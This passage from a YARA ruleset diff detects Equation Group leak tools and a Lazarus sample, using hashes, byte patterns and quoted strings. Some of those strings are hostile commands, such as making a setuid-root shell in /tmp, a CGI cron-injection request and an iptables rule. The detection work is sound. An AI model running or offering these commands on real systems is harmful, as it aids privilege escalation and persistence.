+      hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+      hash3 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Target is vulnerable" fullword ascii
+      $x2 = "Target is NOT vulnerable" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17__ELV_ESKE_EVFR_RideArea2_12_RID3AA5 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 19:55:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
+      hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+      hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x2 = "** CreatePayload ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17__ELV_ESKE_13_RID3586 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:16:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
+      hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Skip call to PackageRideArea().  Payload has already been packaged. Options -x and -q ignored." fullword ascii
+      $s2 = "ERROR: pGvars->pIntRideAreaImplantPayload is NULL" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 600KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17__NameProbe_SMBTOUCH_14_RID3956 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 18:59:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fbe3a4501654438f502a93f51b298ff3abf4e4cad34ce4ec0fad5cb5c2071597"
+      hash2 = "7da350c964ea43c149a12ac3d2ce4675cedc079ddc10d1f7c464b16688305309"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "DEC Pathworks TCPIP service on Windows NT" fullword ascii
+      $s2 = "<\\\\__MSBROWSE__> G" fullword ascii
+      $s3 = "<IRISNAMESERVER>" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17__ELV_ESKE_EVFR_RPC2_15_RID3890 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 18:26:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
+      hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+      hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "** SendAndReceive ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii
+      $s8 = "Binding to RPC Interface %s over named pipe" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17__ELV_ESKE_EVFR_16_RID371B : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:24:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
+      hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+      hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "ERROR: TbMalloc() failed for encoded exploit payload" fullword ascii
+      $x2 = "** EncodeExploitPayload ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii
+      $x4 = "** RunExploit ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii
+      $s6 = "Sending Implant Payload (%d-bytes)" fullword ascii
+      $s7 = "ERROR: Encoder failed on exploit payload" fullword ascii
+      $s11 = "ERROR: VulnerableOS() != RET_SUCCESS" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17__ETBL_ETRE_SMBTOUCH_17_RID3896 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 18:27:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef"
+      hash2 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2"
+      hash3 = "7da350c964ea43c149a12ac3d2ce4675cedc079ddc10d1f7c464b16688305309"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "ERROR: Connection terminated by Target (TCP Ack/Fin)" fullword ascii
+      $s2 = "Target did not respond within specified amount of time" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
+}
+
+rule Enigma_Protector_LazarusSample_RID3326 : APT DEMO EXE FILE MAL T1045 {
+   meta:
+      description = "Detects malware packed with the Enigma protector"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/"
+      date = "2017-04-12 14:35:31"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d4616f9706403a0d5a2f9a8726230a4693e4c95c58df5c753ccc684f1d3542e2"
+      tags = "APT, DEMO, EXE, FILE, MAL, T1045"
+      minimum_yara = "1.7"
+      
+   strings:
+      $op1 = { 5d 5d 5d aa bf 5e 95 d6 dc 51 5d 5d 5d 5e 98 0d } 
+      $op2 = { 52 d9 47 5d 5d 5d dd a6 b4 52 d9 4c 5d 5d 5d 3b } 
+      $op3 = { 9f 59 14 52 d8 a9 a2 a2 a2 00 9f 51 5d d6 d1 79 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+}
+
+rule EquationGroup_store_linux_i386_v_3_3_0_RID3570 : APT DEMO FILE G0020 LINUX {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 16:13:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "abc27fda9a0921d7cf2863c29768af15fdfe47a0b3e7a131ef7e5cc057576fbc"
+      tags = "APT, DEMO, FILE, G0020, LINUX"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[-] Failed to map file: %s" fullword ascii
+      $s2 = "[-] can not NULL terminate input data" fullword ascii
+      $s3 = "[!] Name has size of 0!" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 60KB and all of them )
+}
+
+rule EquationGroup_morerats_client_genkey_RID35F0 : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 16:34:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0ce455fb7f46e54a5db9bef85df1087ff14d2fc60a88f2becd5badb9c7fe3e89"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')" fullword ascii
+      $x2 = "client_auth = binascii.hexlify(lo_execute('openssl rand 16'))" fullword ascii
+   condition: 
+      ( filesize < 3KB and all of them )
+}
+
+rule EquationGroup_cursetingle_2_0_1_2_mswin32_v_2_0_1_RID3920 : APT DEMO EXE FILE G0020 {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 18:50:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "614bf159b956f20d66cedf25af7503b41e91841c75707af0cdf4495084092a61"
+      tags = "APT, DEMO, EXE, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" fullword ascii
+      $s2 = "0123456789abcdefABCEDF:" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+}
+
+rule EquationGroup_cursesleepy_mswin32_v_1_0_0_RID36EC : APT DEMO EXE FILE G0020 {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 17:16:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6293439b4b49e94f923c76e302f5fc437023c91e063e67877d22333f05a24352"
+      tags = "APT, DEMO, EXE, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "A}%j,R" fullword ascii
+      $op1 = { a1 e0 43 41 00 8b 0d 34 44 41 00 6b c0 } 
+      $op2 = { 33 C0 F3 A6 74 14 8B 5D 08 8B 4B 34 50 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+}
+
+rule EquationGroup_cursehelper_win2k_i686_v_2_2_0_RID37A1 : APT DEMO EXE FILE G0020 {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 17:46:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5ac6fde8a06f4ade10d672e60e92ffbf78c4e8db6b5152e23171f6f53af0bfe1"
+      tags = "APT, DEMO, EXE, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/{}" fullword ascii
+      $op1 = { 8d b5 48 ff ff ff 89 34 24 e8 56 2a 00 00 c7 44 } 
+      $op2 = { e9 a2 f2 ff ff ff 85 b4 fe ff ff 8b 95 a8 fe ff } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 500KB and all of them )
+}
+
+rule EquationGroup_morerats_client_addkey_RID35DF : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 16:31:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6c67c03716d06a99f20c1044585d6bde7df43fee89f38915db0b03a42a3a9f4b"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "print '  -s storebin  use storebin as the Store executable\\n'" fullword ascii
+      $x2 = "os.system('%s --file=\"%s\" --wipe > /dev/null' % (storebin, b))" fullword ascii
+      $x3 = "print '  -k keyfile   the key text file to inject'" fullword ascii
+   condition: 
+      ( filesize < 20KB and 1 of them )
+}
+
+rule EquationGroup_noclient_3_3_2_RID31D4 : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 13:39:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3cf0eb010c431372af5f32e2ee8c757831215f8836cabc7d805572bb5574fc72"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warning" fullword ascii
+      $x2 = "iptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;" fullword ascii
+      $x3 = "noclient: failed to execute %s: %s" fullword ascii
+      $x4 = "sh -c \"ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx \"" fullword ascii
+      $s5 = "Attempting connection from 0.0.0.0:" ascii
+   condition: 
+      ( filesize < 1000KB and 1 of them )
+}
+
+rule EquationGroup_curseflower_mswin32_v_1_0_0_RID36E9 : APT DEMO EXE FILE G0020 {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 17:16:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fdc452629ff7befe02adea3a135c3744d8585af890a4301b2a10a817e48c5cbf"
+      tags = "APT, DEMO, EXE, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<pVt,<et(<st$<ct$<nt" fullword ascii
+      $op1 = { 6a 04 83 c0 08 6a 01 50 e8 10 34 00 00 83 c4 10 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+}
+
+rule EquationGroup_tmpwatch_RID302B : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 12:28:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "65ed8066a3a240ee2e7556da74933a9b25c5109ffad893c21a626ea1b686d7c1"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "chown root:root /tmp/.scsi/dev/bin/gsh" fullword ascii
+      $s2 = "chmod 4777 /tmp/.scsi/dev/bin/gsh" fullword ascii
+   condition: 
+      ( filesize < 1KB and 1 of them )
+}
+
+rule EquationGroup_morerats_client_noprep_RID3601 : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 16:37:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a5b191a8ede8297c5bba790ef95201c516d64e2898efaeb44183f8fdfad578bb"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "storestr = 'echo -n \"%s\" | Store --nullterminate --file=\"%s\" --set=\"%s\"' % (nopenargs, outfile, VAR_NAME)" fullword ascii
+      $x2 = "The NOPEN-args provided are injected into infile if it is a valid" fullword ascii
+      $x3 = " -i                do not autokill after 5 hours" fullword ascii
+   condition: 
+      ( filesize < 9KB and 1 of them )
+}
+
+rule EquationGroup_seconddate_ImplantStandalone_3_0_3_RID39CD : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 19:19:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d687aa644095c81b53a69c206eb8d6bdfe429d7adc2a57d87baf8ff8d4233511"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "EFDGHIJKLMNOPQRSUT" fullword ascii
+      $s2 = "G8HcJ HcF LcF0LcN" fullword ascii
+      $s3 = "GhHcJ0HcF@LcF0LcN8H" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 1000KB and all of them )
+}
+
+rule EquationGroup_gr_dev_bin_now_RID3285 : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 14:08:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f5ed8312fc6e624b04e1e2d6614f3c651c9e9902ff41f4d069c32caca0869fa4"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "HTTP_REFERER=\"https://127.0.0.1:6655/cgi/redmin?op=cron&action=once\"" fullword ascii
+      $x2 = "exec /usr/share/redmin/cgi/redmin" fullword ascii
+   condition: 
+      ( filesize < 1KB and 1 of them )
+}
+
+rule EquationGroup_gr_dev_bin_post_RID32F7 : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 14:27:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c1546155efa95dbc4e3cc95299a3968fc075f89d33164e78b00b76c7d08a0591"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "op=cron&action=once&frame=cronOnceFrame&cronK=cronV&cronCommand=%2Ftmp%2Ftmpwatch&time=12%3A12+01%2F28%2F2005" ascii
+   condition: 
+      ( filesize < 1KB and all of them )
+}
+
+rule EquationGroup_curseyo_win2k_v_1_0_0_RID349A : APT DEMO EXE FILE G0020 {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 15:37:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5dc77614764b23a38610fdd8abe5b2274222f206889e4b0974a3fea569055ed6"
+      tags = "APT, DEMO, EXE, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "0123456789abcdefABCEDF:" fullword ascii
+      $op0 = { c6 06 5b 8b bd 70 ff ff ff 8b 9d 64 ff ff ff 0f } 
+      $op1 = { 55 b8 ff ff ff ff 89 e5 83 ec 28 89 7d fc 8b 7d } 
+      $op2 = { ff 05 10 64 41 00 89 34 24 e8 df 1e 00 00 e9 31 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+}
+
+rule EquationGroup_gr_RID2D9C : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 10:39:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d3cd725affd31fa7f0e2595f4d76b09629918612ef0d0307bb85ade1c3985262"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "if [ -f /tmp/tmpwatch ] ; then" fullword ascii
+      $s2 = "echo \"bailing. try a different name\"" fullword ascii
+   condition: 
+      ( filesize < 1KB and all of them )
+}
+
+rule EquationGroup_curseroot_win2k_v_2_1_0_RID3578 : APT DEMO EXE FILE G0020 {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 16:14:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a1637948ed6ebbd2e582eb99df0c06b27a77c01ad1779b3d84c65953ca2cb603"
+      tags = "APT, DEMO, EXE, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%s,%s" fullword ascii
+      $op0 = { c7 44 24 04 ff ff ff ff 89 04 24 e8 46 65 01 00 } 
+      $op1 = { 8d 5d 88 89 1c 24 e8 24 1b 01 00 be ff ff ff ff } 
+      $op2 = { d3 e0 48 e9 0c ff ff ff 8b 45 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 400KB and $s1 and 2 of ( $op* ) )
+}
+
+rule EquationGroup_cursewham_curserazor_cursezinger_curseroot_win2k_RID40E0 : APT DEMO EXE FILE G0020 {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 00:21:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "aff27115ac705859871ab1bf14137322d1722f63705d6aeada43d18966843225"
+      hash2 = "7a25e26950bac51ca8d37cec945eb9c38a55fa9a53bc96da53b74378fb10b67e"
+      tags = "APT, DEMO, EXE, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%s,%s" fullword ascii
+      $s3 = ",%02d%03d" fullword ascii
+      $s4 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" fullword ascii
+      $op1 = { 7d ec 8d 74 3f 01 0f af f7 c1 c6 05 } 
+      $op2 = { 29 f1 89 fb d3 eb 89 f1 d3 e7 } 
+      $op3 = { 7d e4 8d 5c 3f 01 0f af df c1 c3 05 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 400KB and 3 of them )
+}
+
+rule EquationGroup_watcher_linux_i386_v_3_3_0_RID3631 : APT DEMO FILE G0020 LINUX {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 16:45:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ce4c9bfa25b8aad8ea68cc275187a894dec5d79e8c0b2f2f3ec4184dc5f402b8"
+      tags = "APT, DEMO, FILE, G0020, LINUX"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "invalid option `" fullword ascii
+      $s8 = "readdir64" fullword ascii
+      $s9 = "89:z89:%r%opw" fullword wide
+      $s13 = "Ropopoprstuvwypypop" fullword wide
+      $s17 = "Missing argument for `-x'." fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 700KB and all of them )
+}
+
+rule EquationGroup_charm_saver_win2k_v_2_0_0_RID361C : APT DEMO EXE FILE G0020 {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 16:41:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0f7936a37482532a8ba5df4112643ed7579dd0e59181bfca9c641b9ba0a9912f"
+      tags = "APT, DEMO, EXE, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "0123456789abcdefABCEDF:" fullword ascii
+      $op0 = { b8 ff ff ff ff 7f 65 eb 30 8b 55 0c 89 d7 0f b6 } 
+      $op2 = { ba ff ff ff ff 83 c4 6c 89 d0 5b 5e 5f 5d c3 90 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 400KB and all of them )
+}
+
+rule EquationGroup_cursehappy_win2k_v_6_1_0_RID35DA : APT DEMO EXE FILE G0020 {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 16:30:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "eb669afd246a7ac4de79724abcce5bda38117b3138908b90cac58936520ea632"
+      tags = "APT, DEMO, EXE, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $op1 = { e8 24 2c 01 00 85 c0 89 c6 ba ff ff ff ff 74 d6 } 
+      $op2 = { 89 4c 24 04 89 34 24 89 44 24 08 e8 ce 49 ff ff } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 400KB and all of them )
+}
+
+rule EquationGroup_morerats_client_Store_RID357A : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 16:14:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "619944358bc0e1faffd652b6af0600de055c5e7f1f1d91a8051ed9adf5a5b465"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[-] Failed to mmap file: %s" fullword ascii
+      $s2 = "[-] can not NULL terminate input data" fullword ascii
+      $s3 = "Missing argument for `-x'." fullword ascii
+      $s4 = "[!] Value has size of 0!" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 60KB and 2 of them )
+}
+
+rule EquationGroup_watcher_linux_x86_64_v_3_3_0_RID36D6 : APT DEMO FILE G0020 LINUX {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 17:12:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a8d65593f6296d6d06230bcede53b9152842f1eee56a2a72b0a88c4f463a09c3"
+      tags = "APT, DEMO, FILE, G0020, LINUX"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "forceprismheader" fullword ascii
+      $s2 = "invalid option `" fullword ascii
+      $s3 = "forceprism" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 900KB and all of them )
+}
+
+rule EquationGroup_linux_exactchange_RID33CD : APT DEMO FILE G0020 LINUX {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 15:03:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "dfecaf5b85309de637b84a686dd5d2fca9c429e8285b7147ae4213c1f49d39e6"
+      hash2 = "6ef6b7ec1f1271503957cf10bb6b1bfcedb872d2de3649f225cf1d22da658bec"
+      hash3 = "39d4f83c7e64f5b89df9851bdba917cf73a3449920a6925b6cd379f2fdec2a8b"
+      tags = "APT, DEMO, FILE, G0020, LINUX"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[+] looking for vulnerable socket" fullword ascii
+      $x2 = "can't use 32-bit exploit on 64-bit target" fullword ascii
+      $x3 = "[+] %s socket ready, exploiting..." fullword ascii
+      $x4 = "[!] nothing looks vulnerable, trying everything" fullword ascii
+   condition: 
